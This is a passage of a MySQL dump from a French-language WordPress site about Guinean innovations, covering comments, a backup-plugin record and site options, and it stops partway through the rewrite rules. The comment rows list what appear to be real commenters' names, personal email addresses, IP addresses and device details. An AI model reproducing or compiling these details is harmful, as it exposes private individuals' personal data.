-- MySQL dump 10.15  Distrib 10.0.31-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: fmbangoura7_wp787
-- ------------------------------------------------------
-- Server version	10.0.31-MariaDB-cll-lve

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wpfy_commentmeta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=21 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_commentmeta`
--

LOCK TABLES `wpfy_commentmeta` WRITE;
/*!40000 ALTER TABLE `wpfy_commentmeta` DISABLE KEYS */;
INSERT INTO `wpfy_commentmeta` VALUES (1,2,'akismet_error','1509462081'),(2,2,'akismet_history','a:3:{s:4:\"time\";d:1509462081.2702128887176513671875;s:5:\"event\";s:11:\"check-error\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(4,2,'akismet_delayed_moderation_email','1'),(5,3,'akismet_error','1509487345'),(6,3,'akismet_history','a:3:{s:4:\"time\";d:1509487345.5077149868011474609375;s:5:\"event\";s:11:\"check-error\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(8,3,'akismet_delayed_moderation_email','1'),(9,3,'akismet_history','a:3:{s:4:\"time\";d:1509487940.440680980682373046875;s:5:\"event\";s:15:\"status-approved\";s:4:\"user\";s:11:\"fmbangoura7\";}'),(10,4,'akismet_error','1509487941'),(11,4,'akismet_history','a:4:{s:4:\"time\";d:1509487941.0296230316162109375;s:5:\"event\";s:11:\"check-error\";s:4:\"user\";s:11:\"fmbangoura7\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(13,2,'akismet_history','a:3:{s:4:\"time\";d:1509487955.1777191162109375;s:5:\"event\";s:15:\"status-approved\";s:4:\"user\";s:11:\"fmbangoura7\";}'),(14,5,'akismet_error','1510180181'),(15,5,'akismet_history','a:3:{s:4:\"time\";d:1510180181.684585094451904296875;s:5:\"event\";s:11:\"check-error\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(17,5,'akismet_delayed_moderation_email','1'),(18,5,'akismet_history','a:3:{s:4:\"time\";d:1510222144.03335094451904296875;s:5:\"event\";s:15:\"status-approved\";s:4:\"user\";s:11:\"fmbangoura7\";}'),(19,6,'akismet_error','1510222565'),(20,6,'akismet_history','a:4:{s:4:\"time\";d:1510222565.92611598968505859375;s:5:\"event\";s:11:\"check-error\";s:4:\"user\";s:11:\"fmbangoura7\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}');
/*!40000 ALTER TABLE `wpfy_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_comments`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_comments`
--

LOCK TABLES `wpfy_comments` WRITE;
/*!40000 ALTER TABLE `wpfy_comments` DISABLE KEYS */;
INSERT INTO `wpfy_comments` VALUES (2,416,'Dore Jacques Sinata','doresinatajacques9@gmail.com','','41.242.89.95','2017-10-31 15:01:21','2017-10-31 15:01:21','Bravo à cette belle initiative mais en outre vouloir construire la plus part des maisons en bois, ceci provoquera une conséquence négative sur la nature dont la déforestation abusive qui va à l\'encontre des initiatives de la cop 21. Donc prière de trouver une solution pouvant protéger la végétation de façon générale tout en mettant en valeur cette idée innovante ! Merci',0,'1','Mozilla/5.0 (Linux; Android 5.1; itel it1408 Build/LMY47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/49.0.2623.105 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/60.0.0.16.76;]','',0,0),(3,632,'Samba Sory','camaratri83@gmail.com','','197.149.221.81','2017-10-31 22:02:25','2017-10-31 22:02:25','Vraiment encourageant ces jeunes et vous qui faites connaître leurs activités.',0,'1','Mozilla/5.0 (Linux; Android 5.1; TECNO-L8 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/66.0.0.33.73;]','',0,0),(4,632,'fmbangoura7','admin@guineeinnove.nimbasolution.com','','41.223.49.245','2017-10-31 22:12:20','2017-10-31 22:12:20','Tous le plaisir est partagé. Vue que nous sommes au début de notre activité, nous vous demandons d\'aimer notre page Facebook et surtout de la partagée afin de donner encore plus de visibilité à ces gens.',0,'1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','',3,1),(5,613,'Kemoko Millimono','kemokomillimono@gmail.com','','41.79.201.240','2017-11-08 22:29:41','2017-11-08 22:29:41','Je trouve cella très opportun, je tiens à remercier très sincèrement l\'auteur de cette plate-forme et je salut l\'initiative c\'est bien et bon courage.',0,'1','Mozilla/5.0 (Linux; Android 6.0; TECNO-C9 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/77.0.0.20.66;]','',0,0),(6,613,'fmbangoura7','admin@guineeinnove.nimbasolution.com','','41.223.49.245','2017-11-09 10:16:05','2017-11-09 10:16:05','Merci Millimono, je t\'invite à liker la page facebook de la plateforme Guinée innovations.',0,'1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','',5,1);
/*!40000 ALTER TABLE `wpfy_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_duplicator_packages`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_duplicator_packages` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL,
  `hash` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` int(11) NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `owner` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL,
  `package` mediumblob NOT NULL,
  PRIMARY KEY (`id`),
  KEY `hash` (`hash`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_duplicator_packages`
--

LOCK TABLES `wpfy_duplicator_packages` WRITE;
/*!40000 ALTER TABLE `wpfy_duplicator_packages` DISABLE KEYS */;
INSERT INTO `wpfy_duplicator_packages` VALUES (1,'20171208_guineeinnovations','1532b4eeaf4d9dac8367171208093912',20,'2017-12-08 09:40:36','fmbangoura7',0x4F3A31313A224455505F5061636B616765223A32333A7B733A373A2243726561746564223B733A31393A22323031372D31322D30382030393A33393A3132223B733A373A2256657273696F6E223B733A363A22312E322E3330223B733A393A2256657273696F6E5750223B733A353A22342E382E34223B733A393A2256657273696F6E4442223B733A373A2231302E302E3331223B733A31303A2256657273696F6E504850223B733A363A22352E362E3332223B733A393A2256657273696F6E4F53223B733A353A224C696E7578223B733A323A224944223B693A313B733A343A224E616D65223B733A32363A2232303137313230385F6775696E6565696E6E6F766174696F6E73223B733A343A2248617368223B733A33323A223135333262346565616634643964616338333637313731323038303933393132223B733A383A224E616D6548617368223B733A35393A2232303137313230385F6775696E6565696E6E6F766174696F6E735F3135333262346565616634643964616338333637313731323038303933393132223B733A343A2254797065223B693A303B733A353A224E6F746573223B733A303A22223B733A393A2253746F726550617468223B733A36353A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D736E617073686F74732F746D70223B733A383A2253746F726555524C223B733A35323A2268747470733A2F2F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D736E617073686F74732F223B733A383A225363616E46696C65223B733A36393A2232303137313230385F6775696E6565696E6E6F766174696F6E735F31353332623465656166346439646163383336373137313230383039333931325F7363616E2E6A736F6E223B733A373A2252756E74696D65223B4E3B733A373A2245786553697A65223B4E3B733A373A225A697053697A65223B4E3B733A363A22537461747573223B4E3B733A363A22575055736572223B733A31313A22666D62616E676F75726137223B733A373A2241726368697665223B4F3A31313A224455505F41726368697665223A31383A7B733A31303A2246696C74657244697273223B733A303A22223B733A31313A2246696C74657246696C6573223B733A303A22223B733A31303A2246696C74657245787473223B733A303A22223B733A31333A2246696C74657244697273416C6C223B613A303A7B7D733A31343A2246696C74657246696C6573416C6C223B613A303A7B7D733A31333A2246696C74657245787473416C6C223B613A303A7B7D733A383A2246696C7465724F6E223B693A313B733A31323A224578706F72744F6E6C794442223B693A303B733A343A2246696C65223B733A37313A2232303137313230385F6775696E6565696E6E6F766174696F6E735F31353332623465656166346439646163383336373137313230383039333931325F617263686976652E7A6970223B733A363A22466F726D6174223B733A333A225A4950223B733A373A225061636B446972223B733A34383A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D223B733A343A2253697A65223B693A303B733A343A2244697273223B613A303A7B7D733A353A2246696C6573223B613A303A7B7D733A31303A2246696C746572496E666F223B4F3A32333A224455505F417263686976655F46696C7465725F496E666F223A383A7B733A343A2244697273223B4F3A33343A224455505F417263686976655F46696C7465725F53636F70655F4469726563746F7279223A343A7B733A373A225761726E696E67223B613A303A7B7D733A31303A22556E7265616461626C65223B613A303A7B7D733A343A22436F7265223B613A303A7B7D733A383A22496E7374616E6365223B613A303A7B7D7D733A353A2246696C6573223B4F3A32393A224455505F417263686976655F46696C7465725F53636F70655F46696C65223A353A7B733A343A2253697A65223B613A303A7B7D733A373A225761726E696E67223B613A303A7B7D733A31303A22556E7265616461626C65223B613A303A7B7D733A343A22436F7265223B613A303A7B7D733A383A22496E7374616E6365223B613A303A7B7D7D733A343A2245787473223B4F3A32393A224455505F417263686976655F46696C7465725F53636F70655F42617365223A323A7B733A343A22436F7265223B613A303A7B7D733A383A22496E7374616E6365223B613A303A7B7D7D733A393A2255446972436F756E74223B693A303B733A31303A225546696C65436F756E74223B693A303B733A393A2255457874436F756E74223B693A303B733A383A225472656553697A65223B613A303A7B7D733A31313A22547265655761726E696E67223B613A303A7B7D7D733A31303A22002A005061636B616765223B4F3A31313A224455505F5061636B616765223A32333A7B733A373A2243726561746564223B733A31393A22323031372D31322D30382030393A33393A3132223B733A373A2256657273696F6E223B733A363A22312E322E3330223B733A393A2256657273696F6E5750223B733A353A22342E382E34223B733A393A2256657273696F6E4442223B733A373A2231302E302E3331223B733A31303A2256657273696F6E504850223B733A363A22352E362E3332223B733A393A2256657273696F6E4F53223B733A353A224C696E7578223B733A323A224944223B4E3B733A343A224E616D65223B733A32363A2232303137313230385F6775696E6565696E6E6F766174696F6E73223B733A343A2248617368223B733A33323A223135333262346565616634643964616338333637313731323038303933393132223B733A383A224E616D6548617368223B733A35393A2232303137313230385F6775696E6565696E6E6F766174696F6E735F3135333262346565616634643964616338333637313731323038303933393132223B733A343A2254797065223B693A303B733A353A224E6F746573223B733A303A22223B733A393A2253746F726550617468223B733A36353A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D736E617073686F74732F746D70223B733A383A2253746F726555524C223B733A35323A2268747470733A2F2F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D736E617073686F74732F223B733A383A225363616E46696C65223B4E3B733A373A2252756E74696D65223B4E3B733A373A2245786553697A65223B4E3B733A373A225A697053697A65223B4E3B733A363A22537461747573223B4E3B733A363A22575055736572223B4E3B733A373A2241726368697665223B723A32323B733A393A22496E7374616C6C6572223B4F3A31333A224455505F496E7374616C6C6572223A373A7B733A343A2246696C65223B733A37333A2232303137313230385F6775696E6565696E6E6F766174696F6E735F31353332623465656166346439646163383336373137313230383039333931325F696E7374616C6C65722E706870223B733A343A2253697A65223B693A303B733A31303A224F7074734442486F7374223B733A303A22223B733A31303A224F7074734442506F7274223B733A303A22223B733A31303A224F70747344424E616D65223B733A303A22223B733A31303A224F707473444255736572223B733A303A22223B733A31303A22002A005061636B616765223B723A35373B7D733A383A224461746162617365223B4F3A31323A224455505F4461746162617365223A31333A7B733A343A2254797065223B733A353A224D7953514C223B733A343A2253697A65223B4E3B733A343A2246696C65223B733A37323A2232303137313230385F6775696E6565696E6E6F766174696F6E735F31353332623465656166346439646163383336373137313230383039333931325F64617461626173652E73716C223B733A343A2250617468223B4E3B733A31323A2246696C7465725461626C6573223B733A303A22223B733A383A2246696C7465724F6E223B693A303B733A343A224E616D65223B4E3B733A31303A22436F6D70617469626C65223B733A303A22223B733A383A22436F6D6D656E7473223B733A31343A224D61726961444220536572766572223B733A31303A22002A005061636B616765223B723A313B733A32353A22004455505F446174616261736500646253746F726550617468223B4E3B733A32333A22004455505F446174616261736500454F464D61726B6572223B733A303A22223B733A32363A22004455505F4461746162617365006E6574776F726B466C757368223B623A303B7D7D733A32393A22004455505F4172636869766500746D7046696C74657244697273416C6C223B613A303A7B7D733A32343A22004455505F41726368697665007770436F72655061746873223B613A363A7B693A303B733A35373A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D61646D696E223B693A313B733A36373A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D636F6E74656E742F75706C6F616473223B693A323B733A36393A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D636F6E74656E742F6C616E677561676573223B693A333B733A36373A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D636F6E74656E742F706C7567696E73223B693A343B733A36363A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D636F6E74656E742F7468656D6573223B693A353B733A36303A222F686F6D652F666D62616E676F757261372F6775696E6565696E6E6F76652E6E696D6261736F6C7574696F6E2E636F6D2F77702D696E636C75646573223B7D7D733A393A22496E7374616C6C6572223B723A37393B733A383A224461746162617365223B723A38373B7D);
/*!40000 ALTER TABLE `wpfy_duplicator_packages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_links`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_links`
--

LOCK TABLES `wpfy_links` WRITE;
/*!40000 ALTER TABLE `wpfy_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfy_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_options`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=InnoDB AUTO_INCREMENT=2501 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_options`
--

LOCK TABLES `wpfy_options` WRITE;
/*!40000 ALTER TABLE `wpfy_options` DISABLE KEYS */;
INSERT INTO `wpfy_options` VALUES (1,'siteurl','https://guineeinnove.nimbasolution.com','yes'),(2,'home','https://guineeinnove.nimbasolution.com','yes'),(3,'blogname','Guinée innovations','yes'),(4,'blogdescription','Toutes les innovations de la Guinée en un seul endroit.','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','admin@guineeinnove.nimbasolution.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','50','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(29,'rewrite_rules','a:111:{s:19:\"sitemap_index\\.xml$\";s:19:\"index.php?sitemap=1\";s:31:\"([^/]+?)-sitemap([0-9]+)?\\.xml$\";s:51:\"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]\";s:24:\"([a-z]+)?-?sitemap\\.xsl$\";s:25:\"index.php?xsl=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:39:\"amn_mi-lite/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"amn_mi-lite/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"amn_mi-lite/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"amn_mi-lite/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"amn_mi-lite/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:45:\"amn_mi-lite/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:28:\"amn_mi-lite/([^/]+)/embed/?$\";s:44:\"index.php?amn_mi-lite=$matches[1]&embed=true\";s:32:\"amn_mi-lite/([^/]+)/trackback/?$\";s:38:\"index.php?amn_mi-lite=$matches[1]&tb=1\";s:40:\"amn_mi-lite/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?amn_mi-lite=$matches[1]&paged=$matches[2]\";s:47:\"amn_mi-lite/([^/]+)/comment-page-([0-9]{1,})/?$\";s:51:\"index.php?amn_mi-lite=$matches[1]&cpage=$matches[2]\";s:36:\"amn_mi-lite/([^/]+)(?:/([0-9]+))?/?$\";s:50:\"index.php?amn_mi-lite=$matches[1]&page=$matches[2]\";s:28:\"amn_mi-lite/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"amn_mi-lite/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"amn_mi-lite/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"amn_mi-lite/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"amn_mi-lite/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:34:\"amn_mi-lite/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:40:\"index.php?&page_id=360&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"